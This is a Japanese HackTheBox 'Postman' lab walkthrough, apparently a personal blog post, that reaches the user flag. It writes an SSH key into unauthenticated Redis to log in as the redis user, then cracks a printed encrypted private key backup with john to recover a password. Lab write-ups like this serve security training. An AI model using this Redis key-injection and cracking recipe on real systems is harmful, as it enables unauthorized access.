HackTheBox Postman Walkthrough
今回はPostman。ネーミング的にメール系の脆弱性かと思ったら全然違った...
大分慣れてきて、Userを取るためにどこを見ればいいか、早く分かるようになってきた。
目次
Recon
nmap
TCP22番、80番、6379番、10000番が開いている。
6379番はRedis, 10000番にも何かWebサービスが起動しているらしい。
ひとつひとつ見ていく。
┌──(kali㉿kali)-[~] └─$ sudo nmap -A -Pn 10.129.2.1 -p- Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-24 20:20 JST Nmap scan report for 10.129.2.1 Host is up (0.17s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: The Cyber Geek's Personal Website |_http-server-header: Apache/2.4.29 (Ubuntu) 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=3/24%OT=22%CT=1%CU=30196%PV=Y%DS=2%DC=T%G=Y%TM=623C028 OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1 OS:1NW7%O6=M505ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN OS:(R=Y%DF=Y%T=40%W=7210%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 3306/tcp) HOP RTT ADDRESS 1 178.96 ms 10.10.14.1 2 179.08 ms 10.129.2.1 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 755.39 seconds
SSHの調査
パスワードログインを受け付けている模様。
ログイン情報さえ分かれば使えるかもしれない。
┌──(kali㉿kali)-[~] └─$ ssh root@10.129.2.1 The authenticity of host '10.129.2.1 (10.129.2.1)' can't be established. ED25519 key fingerprint is SHA256:eBdalosj8xYLuCyv0MFDgHIabjJ9l3TMv1GYjZdxY9Y. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.129.2.1' (ED25519) to the list of known hosts. root@10.129.2.1's password: Permission denied, please try again. root@10.129.2.1's password: Permission denied, please try again. root@10.129.2.1's password: root@10.129.2.1: Permission denied (publickey,password).
Webの調査
今回は80番と10000番がいるので、それぞれ確認していく。
TCP80番
Gobusterでディレクトリ探索をかける。
┌──(kali㉿kali)-[~] └─$ gobuster dir -u http://10.129.2.1/ -w /usr/share/dirb/wordlists/common.txt -s '200,204,301,302,307,403,500' -e =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.2.1/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Expanded: true [+] Timeout: 10s =============================================================== 2022/03/24 20:36:01 Starting gobuster in directory enumeration mode =============================================================== http://10.129.2.1/.htaccess (Status: 403) [Size: 294] http://10.129.2.1/.hta (Status: 403) [Size: 289] http://10.129.2.1/.htpasswd (Status: 403) [Size: 294] http://10.129.2.1/css (Status: 301) [Size: 306] [--> http://10.129.2.1/css/] http://10.129.2.1/fonts (Status: 301) [Size: 308] [--> http://10.129.2.1/fonts/] http://10.129.2.1/images (Status: 301) [Size: 309] [--> http://10.129.2.1/images/] http://10.129.2.1/index.html (Status: 200) [Size: 3844] http://10.129.2.1/js (Status: 301) [Size: 305] [--> http://10.129.2.1/js/] http://10.129.2.1/server-status (Status: 403) [Size: 298] http://10.129.2.1/upload (Status: 301) [Size: 309] [--> http://10.129.2.1/upload/] =============================================================== 2022/03/24 20:37:30 Finished ===============================================================
/uploadsの中身も見たが、あまり面白そうじゃなかった。
TCP 10000番
これもよく見たらhttpがいる。
gobusterが効かないので、普通にアクセスすると、httpsならいけると言われた。
アクセスするとwebminのログイン画面が出てきた。
PWを忘れた時の情報について調べたら出てきた。
使えないかと思ったがshell取ってからでないとダメそう。
Webminでログインユーザやパスワードを忘れてしまった場合の対処方法
Redisの調査
Redisはキーバリューストア型のNoSQL。
ポートが開いているということはアクセスできるかも?
先に操作用のクライアントツールを入れておく。
sudo apt install redis-tools
┌──(kali㉿kali)-[~] └─$ redis-cli -h 10.129.2.1 -p 6379 10.129.2.1:6379>
認証なしで入れた。
HackTrick:6379 - Pentesting Redis
このリンクをヒントに、Redisの調査をしてみる。
まずはclient listとconfig get *でクライアント情報と設定情報を確認。
┌──(kali㉿kali)-[~] └─$ redis-cli -h 10.129.2.1 -p 6379 10.129.2.1:6379> client list id=3 addr=10.10.14.2:48054 fd=8 name= age=11 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=32768 obl=0 oll=0 omem=0 events=r cmd=client 10.129.2.1:6379> config get * 1) "dbfilename" 2) "dump.rdb" 3) "requirepass" 4) "" 5) "masterauth" 6) "" 7) "cluster-announce-ip" 8) "" 9) "unixsocket" 10) "" 11) "logfile" 12) "/var/log/redis/redis-server.log" 13) "pidfile" 14) "/var/run/redis/redis-server.pid" 15) "slave-announce-ip" 16) "" 17) "maxmemory" 18) "0" 19) "proto-max-bulk-len" 20) "536870912" 21) "client-query-buffer-limit" 22) "1073741824" 23) "maxmemory-samples" 24) "5" 25) "lfu-log-factor" 26) "10" 27) "lfu-decay-time" 28) "1" 29) "timeout" 30) "0" 31) "active-defrag-threshold-lower" 32) "10" 33) "active-defrag-threshold-upper" 34) "100" 35) "active-defrag-ignore-bytes" 36) "104857600" 37) "active-defrag-cycle-min" 38) "25" 39) "active-defrag-cycle-max" 40) "75" 41) "auto-aof-rewrite-percentage" 42) "100" 43) "auto-aof-rewrite-min-size" 44) "67108864" 45) "hash-max-ziplist-entries" 46) "512" 47) "hash-max-ziplist-value" 48) "64" 49) "list-max-ziplist-size" 50) "-2" 51) "list-compress-depth" 52) "0" 53) "set-max-intset-entries" 54) "512" 55) "zset-max-ziplist-entries" 56) "128" 57) "zset-max-ziplist-value" 58) "64" 59) "hll-sparse-max-bytes" 60) "3000" 61) "lua-time-limit" 62) "5000" 63) "slowlog-log-slower-than" 64) "10000" 65) "latency-monitor-threshold" 66) "0" 67) "slowlog-max-len" 68) "128" 69) "port" 70) "6379" 71) "cluster-announce-port" 72) "0" 73) "cluster-announce-bus-port" 74) "0" 75) "tcp-backlog" 76) "511" 77) "databases" 78) "16" 79) "repl-ping-slave-period" 80) "10" 81) "repl-timeout" 82) "60" 83) "repl-backlog-size" 84) "1048576" 85) "repl-backlog-ttl" 86) "3600" 87) "maxclients" 88) "10000" 89) "watchdog-period" 90) "0" 91) "slave-priority" 92) "100" 93) "slave-announce-port" 94) "0" 95) "min-slaves-to-write" 96) "0" 97) "min-slaves-max-lag" 98) "10" 99) "hz" 100) "10" 101) "cluster-node-timeout" 102) "15000" 103) "cluster-migration-barrier" 104) "1" 105) "cluster-slave-validity-factor" 106) "10" 107) "repl-diskless-sync-delay" 108) "5" 109) "tcp-keepalive" 110) "300" 111) "cluster-require-full-coverage" 112) "yes" 113) "cluster-slave-no-failover" 114) "no" 115) "no-appendfsync-on-rewrite" 116) "no" 117) "slave-serve-stale-data" 118) "yes" 119) "slave-read-only" 120) "yes" 121) "stop-writes-on-bgsave-error" 122) "yes" 123) "daemonize" 124) "yes" 125) "rdbcompression" 126) "yes" 127) "rdbchecksum" 128) "yes" 129) "activerehashing" 130) "yes" 131) "activedefrag" 132) "no" 133) "protected-mode" 134) "no" 135) "repl-disable-tcp-nodelay" 136) "no" 137) "repl-diskless-sync" 138) "no" 139) "aof-rewrite-incremental-fsync" 140) "yes" 141) "aof-load-truncated" 142) "yes" 143) "aof-use-rdb-preamble" 144) "no" 145) "lazyfree-lazy-eviction" 146) "no" 147) "lazyfree-lazy-expire" 148) "no" 149) "lazyfree-lazy-server-del" 150) "no" 151) "slave-lazy-flush" 152) "no" 153) "maxmemory-policy" 154) "noeviction" 155) "loglevel" 156) "notice" 157) "supervised" 158) "no" 159) "appendfsync" 160) "everysec" 161) "syslog-facility" 162) "local0" 163) "appendonly" 164) "no" 165) "dir" 166) "/var/lib/redis" 167) "save" 168) "900 1 300 10 60 10000" 169) "client-output-buffer-limit" 170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60" 171) "unixsocketperm" 172) "0" 173) "slaveof" 174) "" 175) "notify-keyspace-events" 176) "" 177) "bind" 178) "0.0.0.0 ::1"
サーバの情報もinfoコマンドで取っておく。
10.129.2.1:6379> info # Server redis_version:4.0.9 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:9435c3c2879311f3 redis_mode:standalone os:Linux 4.15.0-58-generic x86_64 arch_bits:64 multiplexing_api:epoll atomicvar_api:atomic-builtin gcc_version:7.4.0 process_id:682 run_id:0b25ff39a8a45e35f08abb26c1540974b208ae54 tcp_port:6379 uptime_in_seconds:660 uptime_in_days:0 hz:10 lru_clock:4013360 executable:/usr/bin/redis-server config_file:/etc/redis/redis.conf # Clients connected_clients:1 client_longest_output_list:0 client_biggest_input_buf:0 blocked_clients:0 # Memory used_memory:841272 used_memory_human:821.55K used_memory_rss:3883008 used_memory_rss_human:3.70M used_memory_peak:841272 used_memory_peak_human:821.55K used_memory_peak_perc:100.12% used_memory_overhead:832086 used_memory_startup:782456 used_memory_dataset:9186 used_memory_dataset_perc:15.62% total_system_memory:941203456 total_system_memory_human:897.60M used_memory_lua:37888 used_memory_lua_human:37.00K maxmemory:0 maxmemory_human:0B maxmemory_policy:noeviction mem_fragmentation_ratio:4.61 mem_allocator:jemalloc-3.6.0 active_defrag_running:0 lazyfree_pending_objects:0 # Persistence loading:0 rdb_changes_since_last_save:0 rdb_bgsave_in_progress:0 rdb_last_save_time:1648179868 rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec:-1 rdb_current_bgsave_time_sec:-1 rdb_last_cow_size:0 aof_enabled:0 aof_rewrite_in_progress:0 aof_rewrite_scheduled:0 aof_last_rewrite_time_sec:-1 aof_current_rewrite_time_sec:-1 aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size:0 # Stats total_connections_received:1 total_commands_processed:3 instantaneous_ops_per_sec:0 total_net_input_bytes:89 total_net_output_bytes:13364 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 rejected_connections:0 sync_full:0 sync_partial_ok:0 sync_partial_err:0 expired_keys:0 expired_stale_perc:0.00 expired_time_cap_reached_count:0 evicted_keys:0 keyspace_hits:0 keyspace_misses:0 pubsub_channels:0 pubsub_patterns:0 latest_fork_usec:0 migrate_cached_sockets:0 slave_expires_tracked_keys:0 active_defrag_hits:0 active_defrag_misses:0 active_defrag_key_hits:0 active_defrag_key_misses:0 # Replication role:master connected_slaves:0 master_replid:39edf04a0e1be2326ef2ad6a4d3a704d90b16a2c master_replid2:0000000000000000000000000000000000000000 master_repl_offset:0 second_repl_offset:-1 repl_backlog_active:0 repl_backlog_size:1048576 repl_backlog_first_byte_offset:0 repl_backlog_histlen:0 # CPU used_cpu_sys:0.49 used_cpu_user:0.15 used_cpu_sys_children:0.00 used_cpu_user_children:0.00 # Cluster cluster_enabled:0 # Keyspace
先ほどのURLを参考にして、こちらで作ったSSHキーをRedisに仕込めないかを考える。
仕込む先のディレクトリは、/var/lib/redis
10.129.2.1:6379> config get dir 1) "dir" 2) "/var/lib/redis"
キーペアを用意し、中身をテキストファイルに書き出し、さらにそれをRedisに書き込む。
┌──(kali㉿kali)-[~] └─$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/kali/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/kali/.ssh/id_rsa Your public key has been saved in /home/kali/.ssh/id_rsa.pub The key fingerprint is: SHA256:***************************************** kali@kali The key's randomart image is: 〜略〜 ┌──(kali㉿kali)-[~] └─$ ls /home/kali/.ssh id_rsa id_rsa.pub known_hosts ┌──(kali㉿kali)-[~] └─$ (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt ┌──(kali㉿kali)-[~] └─$ cat spaced_key.txt | redis-cli -h 10.129.2.1 -x set ssh_key OK
Redisサーバ側で、書き込んだ公開鍵を保存する 。
10.129.2.1:6379> config set dir /var/lib/redis/.ssh OK 10.129.2.1:6379> config set dbfilename "authorized_keys" OK 10.129.2.1:6379> save OK 10.129.2.1:6379> config get dir 1) "dir" 2) "/var/lib/redis/.ssh"
早速書きこんだ鍵を使ってログイン。Redisサーバに入れた。
┌──(kali㉿kali)-[~] └─$ ssh -i id_rsa redis@10.129.2.1 Warning: Identity file id_rsa not accessible: No such file or directory. Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1 redis@Postman:~$ redis@Postman:~$ whoami redis redis@Postman:~$ pwd /var/lib/redis redis@Postman:~$ cd /home redis@Postman:/home$ ls -ltr total 4 drwxr-xr-x 6 Matt Matt 4096 Sep 11 2019 Matt redis@Postman:/home$ cd Matt redis@Postman:/home/Matt$ ls -ltr total 4 -rw-rw---- 1 Matt Matt 33 Mar 25 03:45 user.txt redis@Postman:/home/Matt$ cat user.txt cat: user.txt: Permission denied
Mattというユーザがいるが、今はredisユーザなので入れない。
Mattユーザのシェルをとらないとだめそう。
嘆いていても仕方ないので、redisユーザで見られる範囲のフォルダを漁る。
すると/optにMattの秘密鍵のバックアップが見つかった。
redis@Postman:/$ ls -ltr total 483892 drwx------ 2 root root 16384 Aug 24 2019 lost+found -rw------- 1 root root 495416320 Aug 24 2019 swapfile drwxr-xr-x 2 root root 4096 Aug 24 2019 media drwxr-xr-x 2 root root 4096 Aug 24 2019 srv drwxr-xr-x 2 root root 4096 Aug 24 2019 mnt drwxr-xr-x 10 root root 4096 Aug 24 2019 usr drwxr-xr-x 2 root root 4096 Aug 24 2019 lib64 lrwxrwxrwx 1 root root 30 Aug 24 2019 vmlinuz.old -> boot/vmlinuz-4.15.0-58-generic lrwxrwxrwx 1 root root 30 Aug 24 2019 vmlinuz -> boot/vmlinuz-4.15.0-58-generic lrwxrwxrwx 1 root root 33 Aug 24 2019 initrd.img.old -> boot/initrd.img-4.15.0-58-generic lrwxrwxrwx 1 root root 33 Aug 24 2019 initrd.img -> boot/initrd.img-4.15.0-58-generic drwxr-xr-x 3 root root 4096 Aug 24 2019 boot -rw-r--r-- 1 root root 2086 Aug 25 2019 webmin-setup.out drwxr-xr-x 2 root root 4096 Aug 25 2019 bin drwxr-xr-x 13 root root 4096 Aug 25 2019 var drwxr-xr-x 3 root root 4096 Sep 11 2019 home drwxr-xr-x 2 root root 4096 Sep 11 2019 opt drwxr-xr-x 18 root root 4096 Oct 25 2019 lib drwxr-xr-x 2 root root 4096 Sep 29 2020 sbin drwxr-xr-x 82 root root 4096 Sep 29 2020 etc dr-xr-xr-x 96 root root 0 Mar 25 03:44 proc dr-xr-xr-x 13 root root 0 Mar 25 03:44 sys drwxr-xr-x 18 root root 3780 Mar 25 03:44 dev drwx------ 8 root root 4096 Mar 25 03:45 root drwxr-xr-x 21 root root 620 Mar 25 04:31 run drwxrwxrwt 13 root root 4096 Mar 25 04:39 tmp redis@Postman:/$ cd /opt redis@Postman:/opt$ ls -ltr total 4 -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 id_rsa.bak redis@Postman:/opt$ cat id_rsa.bak -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2 7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6 cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9 1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS 5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6 jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X 0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+ Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw== -----END RSA PRIVATE KEY----- redis@Postman:/opt$
このままでは使えないので、秘密鍵をクラックする。
クラックには、JohnTheRipperに入っているssh2john.pyを使う。
Kaliにはこのスクリプトは入っていないので、GitHubからダウンロードする。
クラック用のパスワードリストは、/usr/share/wordlists/rockyou.txtを使った。
┌──(kali㉿kali)-[~] └─$ wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py --2022-03-25 14:00:00-- https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py raw.githubusercontent.com (raw.githubusercontent.com) をDNSに問いあわせています... 185.199.111.133, 185.199.109.133, 185.199.110.133, ... raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443 に接続しています... 接続しました。 HTTP による接続要求を送信しました、応答を待っています... 200 OK 長さ: 8537 (8.3K) [text/plain] `ssh2john.py' に保存中 ssh2john.py 100%[=================================================>] 8.34K --.-KB/s 時間 0s 2022-03-25 14:00:00 (26.7 MB/s) - `ssh2john.py' へ保存完了 [8537/8537] ┌──(kali㉿kali)-[~/tools] └─$ python ssh2john.py id_rsa.bak > id_rsa.hash ┌──(kali㉿kali)-[~/tools] └─$ ls -ltr 合計 568 -rwxr-xr-x 1 kali kali 311296 7月 17 2019 plink.exe -rwxr-xr-x 1 kali kali 59392 7月 17 2019 nc_win.exe drwxr-xr-x 6 kali kali 4096 4月 29 2021 sherlock -rwxr-xr-x 1 kali kali 31232 4月 29 2021 churrasco.exe drwxr-xr-x 2 kali kali 4096 5月 4 2021 Windows-Exploit-Suggester-master -rwxr-xr-x 1 kali kali 73802 5月 4 2021 shell.exe drwxr-xr-x 9 kali kali 4096 5月 5 2021 dirsearch -rwxr-xr-x 1 kali kali 5492 10月 12 23:39 php-reverse-shell.php -rwxr-xr-x 1 kali kali 5492 10月 12 23:43 image.php -rw-r--r-- 1 kali kali 46631 10月 13 00:16 LinEnum.sh -rwxr-xr-x 1 kali kali 8537 3月 25 14:00 ssh2john.py -rw-r--r-- 1 kali kali 1743 3月 25 14:09 id_rsa.bak -rw-r--r-- 1 kali kali 2429 3月 25 14:11 id_rsa.hash ┌──(kali㉿kali)-[~/tools] └─$ cat id_rsa.hash id_rsa.bak:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb2867aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b50b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a024848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e414e20dc1510eb476a467f4e861a51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af761e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63 ┌──(kali㉿kali)-[~/tools] └─$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz [sudo] kali のパスワード: ┌──(kali㉿kali)-[~/tools] └─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status computer2008 (id_rsa.bak) 1g 0:00:00:00 DONE (2022-03-25 14:36) 5.000g/s 1234Kp/s 1234Kc/s 1234KC/s confused6..comett Use the "--show" option to display all of the cracked passwords reliably Session completed. ┌──(kali㉿kali)-[~/tools] └─$ john --show id_rsa.hash id_rsa.bak:computer2008 1 password hash cracked, 0 left
パスワードはcomputer2008だと分かった。
ところが、クラックで試行錯誤している間に念の為/etc/ssh/sshd_configを見たところ、
Mattがログイン禁止にされていた。
なんてこったい/(^o^)\
redis@Postman:/etc/ssh$ cat sshd_config # $OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $ # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options override the # default value. Port 22 #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress :: #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_ecdsa_key #HostKey /etc/ssh/ssh_host_ed25519_key # Ciphers and keying #RekeyLimit default none # Logging #SyslogFacility AUTH #LogLevel INFO # Authentication: #LoginGraceTime 2m PermitRootLogin yes #StrictModes yes #MaxAuthTries 6 #MaxSessions 10 PubkeyAuthentication yes # Expect .ssh/authorized_keys2 to be disregarded by default in future. AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 #AuthorizedPrincipalsFile none #AuthorizedKeysCommand none #AuthorizedKeysCommandUser nobody # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # HostbasedAuthentication #IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes # To disable tunneled clear text passwords, change to no here! PasswordAuthentication yes #PermitEmptyPasswords no # Change to yes to enable challenge-response passwords (beware issues with # some PAM modules and threads) ChallengeResponseAuthentication no # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes #KerberosGetAFSToken no # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCredentials yes #GSSAPIStrictAcceptorCheck yes #GSSAPIKeyExchange no # Set this to 'yes' to enable PAM authentication, account processing, # and session processing. If this is enabled, PAM authentication will # be allowed through the ChallengeResponseAuthentication and # PasswordAuthentication. Depending on your PAM configuration, # PAM authentication via ChallengeResponseAuthentication may bypass # the setting of "PermitRootLogin without-password". # If you just want the PAM account and session checks to run without # PAM authentication, then enable this but set PasswordAuthentication # and ChallengeResponseAuthentication to 'no'. UsePAM yes #AllowAgentForwarding yes #AllowTcpForwarding yes #GatewayPorts no X11Forwarding yes #X11DisplayOffset 10 #X11UseLocalhost yes #PermitTTY yes PrintMotd no #PrintLastLog yes #TCPKeepAlive yes #UseLogin no #PermitUserEnvironment no #Compression delayed #ClientAliveInterval 0 #ClientAliveCountMax 3 #UseDNS no #PidFile /var/run/sshd.pid #MaxStartups 10:30:100 #PermitTunnel no #ChrootDirectory none #VersionAddendum none #deny users DenyUsers Matt # no default banner path #Banner none # Allow client to pass locale environment variables AcceptEnv LANG LC_* # override default of no subsystems Subsystem sftp /usr/lib/openssh/sftp-server # Example of overriding settings on a per-user basis #Match User anoncvs # X11Forwarding no # AllowTcpForwarding no # PermitTTY no # ForceCommand cvs server
redisユーザからsu -でMattになることができた。
これで無事Userは取れた。
